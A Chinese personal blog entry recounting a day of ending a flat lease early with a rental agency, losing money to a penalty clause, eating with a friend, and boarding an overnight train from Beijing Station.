江湖的ROH实验没有成功,于是在我的本本上用虚拟机实验了一次,没想到一次就成功了,哈哈,,难道是我的本本有魔法?哈哈。。估计还是他哪里配置的不对。他又用我的本本做了几个实验,一直到下午2点多,我们都很饿了,才决定去中介那看看。


打车来到中介,说明了情况,中介还比较的客气,但我阅读了《合同》,发现其上有违约补偿2个月房租的要求。这样一来,我至少要损失掉2个月的费用的。但无论如何,还是要处理的,如果拖的越久,麻烦就越大了。所以我考虑再三,还是决定处理问题。


谈妥条件,我们和中介代表回到房子处,检查房屋情况和水电消耗情况,经过协商,所有费用计算为50元,我和江湖将房间里的物品一一搬出,又回到了中介公司。


和中介公司协商后,同意退还押金和13天的房租(已经租用了17天),另2个月的费用做为违约金扣除。于是中介退了我1527元,至此,房子问题终于圆满解决,但我为此损失了近2800元。由此可见,签合同时要看清楚条款的。


从中介公司出来,我们打车来到了江湖的家,我要把一些东西暂时存放在江湖家。放下东西,我们才想起中午因为处理房子的事情没有吃饭,于是一起出来吃饭,找到了一家“羊大爷”的饭店,吃了顿不错的羊骨头,还有一些小菜,我还点了汤圆,吃饱喝足后,时间已经是下午6点多了,我回到江湖家,把需要带走的衣服整理了一下,装在包里,准备出发。


7点钟,我从江湖家出发,打车到地铁站,坐地铁自西直门中转到北京站,路上收到同事的短消息,到了北京站后,我顺利的进入车站,找到了第二候车室,在候车室里,我找到了同去的同事,一起说说话,等剪票。半个小时后,开始检票了,我们通过了检票口,进入站台,找到了6车厢,上车,找到自己的铺位,放好东西。


我们6个人定的全都是中铺,所以是两个一组,我和胡义是一组,约9点,车开了,我们聊聊天,说说话,时间过的很快,10点车厢熄灯了,我们各自上铺位准备睡觉,我因为不太困,于是用PPC看了一部电影《依沙贝拉》,一部不错的电影,在PPC上看效果还不错,看完电影,也困了,于是睡觉啦。哈哈。。明天见。。